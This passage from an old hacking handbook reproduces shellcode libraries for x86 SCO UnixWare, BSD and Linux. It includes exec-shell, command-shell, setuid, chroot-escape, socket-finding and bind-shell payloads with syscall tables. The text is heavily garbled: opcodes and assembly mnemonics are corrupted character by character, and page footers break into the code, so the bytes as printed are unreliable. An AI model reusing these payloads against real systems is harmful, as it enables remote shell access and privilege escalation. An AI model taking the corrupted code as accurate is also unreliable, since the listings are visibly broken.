KOx"0K /- *ushl Jeax -/
KOxb0Ox,#K /- mo?b P0x,#,Jal -/
KOxffOxd(K /- call -Jesi -/
;
char chrootcode./ /- C0 b>tes -/
KOx(DKKb...K /- *ushl P0x!e!e!e(! -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDDOxC#Ox0BK /- mo?b Jal,0xB(Jedi) -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox"0K /- mo?b P0x"0,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxC#K /- incl Jedi -/
KOxBBOxcMK /- xorl Jecx,Jecx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox0cK /- mo?b P0x0c,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxe!OxfaK /- loo* QchrootcodeN!D$ -/
KOxC#K /- incl Jedi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
;
char findsckcode./ /- (# b>tes -/
KOx"(K /- *ushl Jesi -/
KOx"fK /- *o*l Jedi -/
KOxDBOxefOx#cK /- subl P0x#c,Jedi -/
KOx"#K /- *ushl Jedi -/
KOxDdOxCfOx,0K /- leal 0x,0(Jedi),Jecx -/
KOxb0OxM,K /- mo?b P0xM,,Jal -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM,K /- xchgl Jecx,Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM"K /- xchgl Jeax,Jeb* -/
KOxb"Ox"CK /- mo?b P0x"C,Jch -/
KOx",K /- *ushl Jecx -/
KOx((OxbMOx0,Ox0,K /- mo?E P0x0,0,,Jcx -/
KOx",K /- *ushl Jecx -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxb0OxB(K /- mo?b P0xB(,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx"MK /- *o*l Jecx -/
KOxBBOxdbK /- xorl Jebx,Jebx -/
KOxBbOxcBK /- cm*l Jebx,Jeax -/
KOx#"Ox0aK /- %ne QfindsckcodeNC#$ -/
KOx((OxbbOx,!OxBCK /- mo?E P0x,!BC,Jbx -/
KOx((OxBMOx"dOx0!K /- cm*E Jbx,0x!(Jeb*) -/
KOx#COx0!K /- %e QfindsckcodeNCM$ -/
KOxe!Oxe(K /- loo* QfindsckcodeN!B$ -/
KOx(aOx0MK /- *ushb P0x0M -/
KOx",K /- *ushl Jecx -/
KOxM,K /- xchgl Jecx,Jeax -/
KOxb,Ox0BK /- mo?b P0x0B,Jcl -/
KOxCMK /- decl Jecx -/
KOxDMOxCcOx!COx0DK /- mo?l Jecx,0xD(Jes*) -/
KOxC,K /- incl Jecx -/
KOxb0OxBeK /- mo?b P0xBe,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxe!OxfCK /- loo* QfindsckcodeN""$ -/
;
char bindsckcode./ /- #B b>tes -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx(DOxffOx0!Ox,!OxBCK /- *ushl P0xBC,!0!ff -/
KOxDMOxe#K /- mo?l Pes*,Jedi -/
KOxC0K /- incl Jeax -/
KOx"0K /- *ushl Jeax -/
KOxCDK /- decl Jeax -/
KOx"0K /- *ushl Jeax -/
KOx"0K /- *ushl Jeax -/
KOxb0Ox0!K /- mo?b P0x0!,Jal -/
KOx"0K /- *ushl Jeax -/
KOx"0K /- *ushl Jeax -/
KOxb0Oxe(K /- mo?b P0xe(,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxDbOxdDK /- mo?l Jeax,Jebx -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDMOxC#Ox0CK /- mo?l Jeax,0xC(Jedi) -/
KOx(aOx,0K /- *ushb P0x,0 -/
KOx"#K /- *ushl Jedi -/
KOx"BK /- *ushl Jebx -/
KOxb0OxeDK /- mo?b P0xeD,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx(aOx0"K /- *ushb P0x0" -/
KOx"BK /- *ushl Jebx -/
KOxb0OxeMK /- mo?b P0xeM,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx"0K /- *ushl Jeax -/
KOx"BK /- *ushl Jebx -/
KOxb0OxeaK /- mo?b P0xea,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxDbOxdDK /- mo?l Jeax,Jebx -/
KOx(aOx0MK /- *ushb P0x0M -/
KOx"BK /- *ushl Jebx -/
KOxM,K /- xchgl Jecx,Jeax -/
KOxb,Ox0BK /- mo?b P0x0B,Jcl -/
KOxCMK /- decl Jecx -/
KOxDMOxCcOx!COx0DK /- mo?l Jecx,0xD(Jes*) -/
KOxC,K /- incl Jecx -/
KOxb0OxBeK /- mo?b P0xBe,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxe!OxfCK /- loo* QbindsckcodeN(,$ -/
;
char %um*./
KOxDbOxcCK /- mo?l Jes*,Jeax -/
KOxcBK /- ret -/
;
Hdefine 2I3F689@7:5726 BM
Hdefine AI3F689@7:5726 0"
Hendif
SCOfOpe'Ser(er,U'ix"areg/x%& codes, file:x%&-sco
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for o*enser?er ".0.C unixEare #.0 xD( H-/
/-
s>scall Jeax stack
----------- ---- ---------------------------------------------------------------
exec x00b ret,-$*athK/bin/kshK,-$.-$a0*ath,0/
exec x00b ret,-$*athK/bin/kshK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setuid x0,# ret,uid0
mkdir x0"0 ret,-$*athKb..K,mode (each ?alue is ?alid)
chroot x0Bd ret,-$*ath)Kb..K,K.K0
chdir x00c ret,-$*athK..K
ioctl x0B( ret,sfd,5I'I45@44:31;40x"CM,,-$.mlen0xM,,len0xM,,-$sadr.//
close x00( ret,fd)0,,,!0
du* x0!M ret,sfd
-/
Hif defined(LD() ++ ( defined(7@4364:S4:) WW defined(<3ILV1:4) )
char 'shellcode./ /- BBND b>tes -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxebOx,aK /- %m* QshellcodeN!D$ -/
KOxBBOxd!K /- xorl Jedx,Jedx -/
KOx"DK /- *o*l Jeax -/
KOxDdOx#DOx,CK /- leal 0x,C(Jeax),Jedi -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM!K /- xchgl Jeax,Jedx -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDDOxC!Ox0DK /- mo?b Jal,0xD(Jedx) -/
KOxDBOxefOxBbK /- subl P0xBb,Jedi -/
KOxb0OxMaK /- mo?b P0xMa,Jal -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxC#K /- incl Jedi -/
KOxb0Ox0#K /- mo?b P0x0#,Jal -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxeDOxe,OxffOxffOxffK /- call QshellcodeN!$ -/
K/bin/kshK
;
char s>scallcode./ /- !( b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxebOx0MK /- %m* Qs>scallcodeN,B$ -/
KOx"fK /- *o*l Jedi -/
KOx"#K /- *ushl Jedi -/
KOxC#K /- incl Jedi -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxC#K /- incl Jedi -/
KOxaaK /- stosb Jal,JesG(Jedi) -/
KOx"eK /- *o*l Jesi -/
KOxebOx0dK /- %m* Qs>scallcodeN!($ -/
KOxeDOxf!OxffOxffOxffK /- call Qs>scallcodeNC$ -/
KOxMaOxffOxffOxffOxffK
KOx0#OxffK
KOxcBK /- ret -/
;
char shellcode./ /- !"ND b>tes -/
KOxebOx,!K /- %m* QshellcodeN!0$ -/
KOxBBOxd!K /- xorl Jedx,Jedx -/
KOx"DK /- *o*l Jeax -/
KOxDdOx#DOx,CK /- leal 0x,C(Jeax),edi -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM!K /- xchgl Jeax,Jedx -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDDOxC!Ox0DK /- mo?b Jal,0xD(Jedx) -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxeDOxeMOxffOxffOxffK /- call QshellcodeN!$ -/
K/bin/kshK
;
char cmdshellcode./ /- B(N,!Ncmdlen b>tes -/
KOxebOx,dK /- %m* QcmdshellcodeNB,$ -/
KOxBBOxd!K /- xorl Jedx,Jedx -/
KOx"DK /- *o*l Jeax -/
KOxDdOx#DOxacK /- leal -0xCC(Jeax),edi -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxDDOx"0Ox0DK /- mo?b Jdl,0xD(Jeax) -/
KOxDDOx"0Ox0bK /- mo?b Jdl,0xb(Jeax) -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDdOxC0Ox0MK /- leal 0x0M(Jeax),Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxDdOxC0Ox0BK /- leal 0x0B(Jeax),Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM!K /- xchgl Jeax,Jedx -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxeDOxdeOxffOxffOxffK /- call QcmdshellcodeN!$ -/
K/bin/ksh -c K
/- command -/
;
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
char setuidcode./ /- # b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOxb0Ox,#K /- mo?b P0x,#,Jal -/
KOxffOxd(K /- call -Jesi -/
;
char chrootcode./ /- C0 b>tes -/
KOx(DKKb...K /- *ushl P0x!e!e!e(! -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDDOxC#Ox0BK /- mo?b Jal,0xB(Jedi) -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox"0K /- mo?b P0x"0,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxC#K /- incl Jedi -/
KOxBBOxcMK /- xorl Jecx,Jecx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox0cK /- mo?b P0x0c,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxe!OxfaK /- loo* QchrootcodeN!D$ -/
KOxC#K /- incl Jedi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
;
Hif defined(<3ILV1:4)
char findsckcode./ /- (# b>tes -/
KOx"(K /- *ushl Jesi -/
KOx"fK /- *o*l Jedi -/
KOxDBOxefOx#cK /- subl P0x#c,Jedi -/
KOx"#K /- *ushl Jedi -/
KOxDdOxCfOx,0K /- leal 0x,0(Jedi),Jecx -/
KOxb0OxM,K /- mo?b P0xM,,Jal -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM,K /- xchgl Jecx,Jeax -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOxM"K /- xchgl Jeax,Jeb* -/
KOxb"Ox"CK /- mo?b P0x"C,Jch -/
KOx",K /- *ushl Jecx -/
KOx((OxbMOx0,Ox0,K /- mo?E P0x0,0,,Jcx -/
KOx",K /- *ushl Jecx -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxb0OxB(K /- mo?b P0xB(,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx"MK /- *o*l Jecx -/
KOxBBOxdbK /- xorl Jebx,Jebx -/
KOxBbOxcBK /- cm*l Jebx,Jeax -/
KOx#"Ox0aK /- %ne QfindsckcodeNC#$ -/
KOx((OxbbOx,!OxBCK /- mo?E P0x,!BC,Jbx -/
KOx((OxBMOx"dOx0!K /- cm*E Jbx,0x!(Jeb*) -/
KOx#COx0!K /- %e QfindsckcodeNCM$ -/
KOxe!Oxe(K /- loo* QfindsckcodeN!B$ -/
KOxDbOxdMK /- mo?l Jecx,Jebx -/
KOxb,Ox0BK /- mo?b P0x0B,Jcl -/
KOxCMK /- decl Jecx -/
KOx",K /- *ushl Jecx -/
KOxb0Ox0(K /- mo?b P0x0(,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx"BK /- *ushl Jebx -/
KOxb0Ox!MK /- mo?b P0x!M,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxC,K /- incl Jecx -/
KOxe!Oxf!K /- loo* QfindsckcodeN"B$ -/
;
Hendif
char %um*./
KOxDbOxcCK /- mo?l Jes*,Jeax -/
KOxcBK /- ret -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
;
Hdefine 2I3F689@7:5726 BM
Hdefine AI3F689@7:5726 0"
Hdefine 687
Hendif
f)ree,*e#,Ope'g+S,/x%& codes, file: x%&--sd
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for freebsd B.C o*enbsd !.D netbsd ,." xD( H-/
/-
s>scall Jeax stack
----------- ---- ---------------------------------------------------------------
exec?e x0Bb ret,-$*athK/bin//shK,-$.-$a00/,0
exec?e x0Bb ret,-$*athK/bin//shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/,0
setuid x0,# ret,uid0
mkdir x0DD ret,-$*athKb..K,mode (each ?alue is ?alid)
chroot x0Bd ret,-$*ath)Kb..K,K.K0
chdir x00c ret,-$*athK..K
get*eername x0,f ret,sfd,-$sadr./,-$.len0x,0/
socket x0(, ret,12'I345!,6789'65:41;,,*rot0
bind x0(D ret,sfd,-$sadr.0xff,!,hi,lo,0,0,0,0/,-$.0x,0/
listen x0(a ret,sfd,backlog"
acce*t x0,e ret,sfd,0,0
du*! x0"a ret,sfd,fd)0,,,!0
-/
Hif defined(LD() ++ ( defined(7@43A6F) WW defined(2:44A6F) WW defined(345A6F) )
char shellcode./ /- !B b>tes -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKK//shK /- *ushl P0x(D#B!f!f -/
KOx(DKK/binK /- *ushl P0x(e(M(!!f -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
KOx"CK /- *ushl Jes* -/
KOx"BK /- *ushl Jebx -/
KOx"0K /- *ushl Jeax -/
KOxb0OxBbK /- mo?b P0xBb,Jal -/
KOxcdOxD0K /- int P0xD0 -/
;
char cmdshellcode./ /- CCNcmdlen b>tes -/
KOxebOx!"K /- %m* QcmdshellcodeNBM$ -/
KOx"MK /- *o*l Jecx -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKK//shK /- *ushl P0x(D#B!f!f -/
KOx(DKK/binK /- *ushl P0x(e(M(!!f -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
KOx((Ox(DKK-cK /- *ushE P0x(B!d -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOx"0K /- *ushl Jeax -/
KOx",K /- *ushl Jecx -/
KOx"#K /- *ushl Jedi -/
KOx"BK /- *ushl Jebx -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOx"0K /- *ushl Jeax -/
KOx"#K /- *ushl Jedi -/
KOx"BK /- *ushl Jebx -/
KOx"0K /- *ushl Jeax -/
KOxb0OxBbK /- mo?b P0x0b,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxeDOxd(OxffOxffOxffK /- call QcmdshellcodeN!$ -/
/- command -/
;
char setuidcode./ /- # b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOxb0Ox,#K /- mo?b P0x,#,Jal -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx"0K /- *ushl Jeax -/
KOxcdOxD0K /- int P0xD0 -/
;

char chrootcode./ /- CC b>tes -/
KOx(DKKb...K /- *ushl P0x!e!e!e(! -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDDOxC#Ox0BK /- mo?b Jal,0xB(Jedi) -/
KOx"#K /- *ushl Jedi -/
KOxb0OxDDK /- mo?b P0xDD,Jal -/
KOx"0K /- *ushl Jeax -/
KOxcdOxD0K /- int P0xD0 -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOx"0K /- *ushl Jeax -/
KOxcdOxD0K /- int P0xD0 -/
KOxC#K /- incl Jedi -/
KOxBBOxcMK /- xorl Jecx,Jecx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxb0Ox0cK /- mo?b P0x0c,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxe!OxfaK /- loo* QchrootcodeNB,$ -/
KOxC#K /- incl Jedi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOx"0K /- *ushl Jeax -/
KOxcdOxD0K /- int P0xD0 -/
;
char findsckcode./ /- "M b>tes -/
KOx"(K /- *ushl Jesi -/
KOx"fK /- *o*l Jedi -/
KOxDBOxefOx#cK /- subl P0x#c,Jedi -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox,0K /- mo?b P0x,0,Jal -/
KOxabK /- stosl Jeax,JesG(Jedi) -/
KOx"#K /- *ushl Jedi -/
KOxB,OxcMK /- xorl Jecx,Jecx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOx",K /- *ushl Jecx -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxb0Ox,fK /- mo?b P0x,f,Jal -/
KOx",K /- *ushl Jecx -/
KOxcdOxD0K /- int P0xD0 -/
KOx"MK /- *o*l Jecx -/
KOx"MK /- *o*l Jecx -/
KOxBBOxdbK /- xorl Jebx,Jebx -/
KOxBbOxcBK /- cm*l Jebx,Jeax -/
KOx#"Ox0aK /- %ne QfindsckcodeNC0$ -/
KOx((OxbbOx,!OxBCK /- mo?E P0x,!BC,Jbx -/
KOx((OxBMOx"fOx0!K /- cm*E Jbx,0x!(Jedi) -/
KOx#COx0!K /- %e QfindsckcodeNC!$ -/
KOxe!OxeCK /- loo* QfindsckcodeN,C$ -/
KOx",K /- *ushl Jecx -/
KOx"0K /- *ushl Jeax -/
KOxM,K /- xchgl Jecx,Jeax -/
KOxb,Ox0BK /- mo?b P0x0B,Jcl -/
KOxCMK /- decl Jecx -/
KOxDMOxCcOx!COx0DK /- mo?l Jecx,0xD(Jes*) -/
KOxC,K /- incl Jecx -/
KOxb0Ox"aK /- mo?b P0x"a,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxe!OxfCK /- loo* QfindsckcodeNC#$ -/
;
char bindsckcode./ /- #0 b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx(DOxffOx0!Ox,!OxBCK /- *ushl P0xBC,!0!ff -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOx"0K /- *ushl Jeax -/
KOx(aOx0,K /- *ushl P0x0, -/
KOx(aOx0!K /- *ushl P0x0! -/
KOxb0Ox(,K /- mo?b P0x(,,Jal -/
KOx"0K /- *ushl Jeax -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxcdOxD0K /- int P0xD0 -/
KOxDbOxdDK /- mo?l Jeax,Jebx -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDMOxC#Ox0CK /- mo?l Jeax,0xC(Jedi) -/
KOx(aOx,0K /- *ushb P0x,0 -/
KOx"#K /- *ushl Jedi -/
KOx"BK /- *ushl Jebx -/
KOxb0Ox(DK /- mo?b P0x(D,Jal -/
KOx"0K /- *ushl Jeax -/
KOxcdOxD0K /- int P0xD0 -/
KOx(aOx0"K /- *ushb P0x0" -/
KOx"BK /- *ushl Jebx -/
KOxb0Ox(aK /- mo?b P0x(a,Jal -/
KOx"0K /- *ushl Jeax -/
KOxcdOxD0K /- int P0xD0 -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx"0K /- *ushl Jeax -/
KOx"BK /- *ushl Jebx -/
KOxb0Ox,eK /- mo?b P0x,e,Jal -/
KOx"0K /- *ushl Jeax -/
KOxcdOxD0K /- int P0xD0 -/
KOx"0K /- *ushl Jeax -/
KOx"0K /- *ushl Jeax -/
KOxM,K /- xchgl Jecx,Jeax -/
KOxb,Ox0BK /- mo?b P0x0B,Jcl -/
KOxCMK /- decl Jecx -/
KOxDMOxCcOx!COx0DK /- mo?l Jecx,0xD(Jes*) -/
KOxC,K /- incl Jecx -/
KOxb0Ox"aK /- mo?b P0x"a,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxe!OxfCK /- loo* QbindsckcodeN"D$ -/
;
char %um*./
KOxDbOxcCK /- mo?l Jes*,Jeax -/
KOxcBK /- ret -/
;
Hdefine 2I3F689@7:5726 B!
Hdefine AI3F689@7:5726 0"
Hdefine A6F
Hendif
$i'ux/x%& codes, file: x%&-li'ux
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for linux (redhat (.!) xD( H-/
/-
s>scall Jeax Jebx,Jecx,Jedx
----------- ---- ---------------------------------------------------------------
exec x00b -$*athK/bin//shK,-$.-$a0*ath,0/
exec x00b -$*athK/bin//shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setuid x0,# uid0
mkdir x0!# -$*athKb..K,mode0 (each ?alue is ?alid)
chroot x0Bd -$*ath)Kb..K,K.K0
chdir x00c -$*athK..K
socketcall x0(( get*eername#,-$.sfd,-$sadr./,-$.len0x,0//
socketcall x0(( socket,,-$.12'I345!,6789'65:41;!,*rot0/
socketcall x0(( bind!,-$.sfd,-$sadr.0xff,!,hi,lo,0,0,0,0/,len0x,0/
socketcall x0(( listenC,-$.sfd,backlog,0!/
socketcall x0(( acce*t",-$.sfd,0,0/
du*! x0Bf sfd,fd)!,,,00
-/
Hif defined(LD() ++ defined(=I3<L)
char shellcode./ /- !C b>tes -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKK//shK /- *ushl P0x(D#B!f!f -/
KOx(DKK/binK /- *ushl P0x(e(M(!!f -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx"BK /- *ushl Jebx -/
KOxDMOxe,K /- mo?l Jes*,Jecx -/
KOxMMK /- cdRl -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxcdOxD0K /- int P0xD0 -/
;
char cmdshellcode./ /- C0Ncmdlen b>tes -/
KOxebOx!!K /- %m* QcmdshellcodeNB($ -/
KOx"MK /- *o*l Jecx -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKK//shK /- *ushl P0x(D#B!f!f -/
KOx(DKK/binK /- *ushl P0x(e(M(!!f -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
KOx((Ox(DKK-cK /- *ushE P0x(B!d -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOx"0K /- *ushl Jeax -/
KOx",K /- *ushl Jecx -/
KOx"#K /- *ushl Jedi -/
KOx"BK /- *ushl Jebx -/
KOxDMOxe,K /- mo?l Jes*,Jecx -/
KOxMMK /- cdRl -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxeDOxdMOxffOxffOxffK /- call QcmdshellcodeN!$ -/
/- command -/
;
char setuidcode./ /- D b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxB,OxdbK /- xorl Jebx,Jebx -/
KOxb0Ox,#K /- mo?b P0x,#,Jal -/
KOxcdOxD0K /- int P0xD0 -/
;
char chrootcode./ /- B# b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKKbb..K /- *ushl P0x!e!e(!(! -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOxCBK /- incl Jebx -/
KOxBBOxcMK /- xorl Jecx,Jecx -/
KOxb0Ox!#K /- mo?b P0x!#,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxCBK /- incl Jebx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOxb0Ox0cK /- mo?b P0x0c,Jal -/
KOxcdOxD0K /- int P0xD0 -/
KOxe!OxfaK /- loo* QchrootcodeN!,$ -/
KOxCBK /- incl Jebx -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxcdOxD0K /- int P0xD0 -/
;
char findsckcode./ /- #! b>tes -/
KOxB,OxdbK /- xorl Jebx,Jebx -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOxDdOx##Ox,0K /- leal 0x,0(Jedi),Jesi -/
KOxDMOx##Ox0CK /- mo?l Jesi,0xC(Jedi) -/
KOxDdOxCfOx!0K /- leal 0x!0(Jedi),Jecx -/
KOxDMOxCfOx0DK /- mo?l Jecx,0xD(Jedi) -/
KOxbBOx,0K /- mo?b P0x,0,Jbl -/
KOxDMOx,MK /- mo?l Jebx,(Jecx) -/
KOxB,OxcMK /- xorl Jecx,Jecx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOxDMOx0fK /- mo?l Jecx,(Jedi) -/
KOx",K /- *ushl Jecx -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOxb0Ox((K /- mo?b P0x((,Jal -/
KOxbBOx0#K /- mo?b P0x0#,Jbl -/
KOxDMOxfMK /- mo?l Jedi,Jecx -/
KOxcdOxD0K /- int P0xD0 -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx"MK /- *o*l Jecx -/
KOxB,OxdbK /- xorl Jebx,Jebx -/
KOxBMOxdDK /- cm*l Jebx,Jeax -/
KOx#"Ox0aK /- %ne QfindsckcodeN"C$ -/
KOx((OxbDOx,!OxBCK /- mo?E P0x,!BC,Jbx -/
KOx((OxBMOxC(Ox0!K /- cm*E Jbx,0x!(Jesi) -/
KOx#COx0!K /- %e QfindsckcodeN"($ -/
KOxe!Oxe0K /- loo* QfindsckcodeN!C$ -/
KOxDMOxcbK /- mo?l Jecx,Jebx -/
KOxB,OxcMK /- xorl Jecx,Jecx -/
KOxb,Ox0BK /- mo?b P0x0B,Jcl -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOxb0OxBfK /- mo?b P0xBf,Jal -/
KOxCMK /- decl Jecx -/
KOxcdOxD0K /- int P0xD0 -/
KOxC,K /- incl Jecx -/
KOxe!Oxf(K /- loo* QfindsckcodeN(!$ -/
;
char bindsckcode./ /- #B b>tes -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DOxffOx0!Ox,!OxBCK /- *ushl P0xBC,!0!ff -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOx"0K /- *ushl Jeax -/
KOx(aOx0,K /- *ushb P0x0, -/
KOx(aOx0!K /- *ushb P0x0! -/
KOxDMOxe,K /- mo?l Jes*,Jecx -/
KOxb0Ox((K /- mo?b P0x((,Jal -/
KOxB,OxdbK /- xorl Jebx,Jebx -/
KOxCBK /- incl Jebx -/
KOxcdOxD0K /- int P0xD0 -/
KOx(aOx,0K /- *ushb P0x,0 -/
KOx"#K /- *ushl Jedi -/
KOx"0K /- *ushl Jeax -/
KOxDMOxe,K /- mo?l Jes*,Jecx -/
KOxb0Ox((K /- mo?b P0x((,Jal -/
KOxCBK /- incl Jebx -/
KOxcdOxD0K /- int P0xD0 -/
KOxb0Ox((K /- mo?b P0x((,Jal -/
KOxbBOx0CK /- mo?b P0x0C,Jbl -/
KOxDMOxCCOx!COx0CK /- mo?l Jeax,0xC(Jes*) -/
KOxcdOxD0K /- int P0xD0 -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDBOxcCOx0cK /- addl P0x0c,Jes* -/
KOx"0K /- *ushl Jeax -/
KOx"0K /- *ushl Jeax -/
KOxb0Ox((K /- mo?b P0x((,Jal -/
KOxCBK /- incl Jebx -/
KOxcdOxD0K /- int P0xD0 -/
KOxDMOxcBK /- mo?l Jeax,Jebx -/
KOxB,OxcMK /- xorl Jecx,Jecx -/
